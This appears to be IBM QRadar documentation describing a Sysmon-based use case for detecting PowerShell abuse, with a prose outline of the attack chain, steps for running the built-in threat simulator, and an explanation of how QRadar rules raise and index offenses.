Sysmon: PowerShell

Sysmon is a Microsoft Windows system service and device driver that monitors system activity and logs events in the Windows event log. You can forward the Windows event logs to QRadar and analyze them to detect advanced threats on the Windows endpoints.

The Sysmon use case shows how QRadar detects suspicious behavior after a user downloads a file attachment and runs it on a Windows workstation.

When a user clicks the downloaded file, the file starts a command shell that runs a PowerShell script to download and run a file from an external location, which compromises a user's computer. The attacker now escalates their privileges to system-level access permissions, and downloads the usernames and passwords for the network. By logging in to peer computers, the attacker can move laterally and run PowerShell scripts to run processes on multiple computers across the network.

For more QRadar content that supports the Sysmon: PowerShell use case, download the IBM QRadar Content Extension for Sysmon. The content pack includes rules, building blocks, reference sets, and custom functions that can be used to detect advanced threats, such as PowerShell abuse, hidden Windows processes, and file-less memory attacks.

Simulating the threat

To see how QRadar detects the attack, watch the Sysmon: Powershell simulation video.

To run the simulation in QRadar, follow these steps:
  1. On the Log Activity tab, click Show Experience Center.
  2. Click Threat simulator.
  3. Locate the Sysmon: PowerShell simulation and click Run.
On the Log Activity tab, you can see the following incoming events that are used to simulate the use case:
Table 1. Incoming events for the Sysmon: PowerShell use case
Content Description
Events Process Create


A service was installed in a system


Log sources Experience Center: WindowsAuthServer @ EC: <machine_name>

Experience Center: WindowsAuthServer @ EC: <user_name>

The events play in a loop and the same use case repeats multiple times. To stop the simulation, click Stop on the Threat simulator tab.

Detecting the threat: QRadar in action

The Custom Rules Engine (CRE) component of QRadar is responsible for processing incoming events and flows. The CRE compares the events and flows against a collection of tests, which are known as rules, and the rules create offenses when specific conditions are met. The CRE tracks the rule tests and incident counts over time.

But knowing that an offense occurred is only the first step. QRadar makes it easier for you to do a deeper dive and identify how it happened, where it happened, and who did it. By indexing the offense, all events with the same threat name appear as a single offense.

Investigating the threat

To see the list of QRadar content that contributes to this simulation, including rules, saved searches, offenses, and reference sets, follow these steps:
  1. Open the IBM QRadar Experience Center app.
  2. In the Threat simulator window, click the Read More link for the simulation, and select the type of content that you want to review.

    Alternatively, from the Log Activity tab, you can run the quick search called EC: Sysmon events to view all events that are associated with the offense.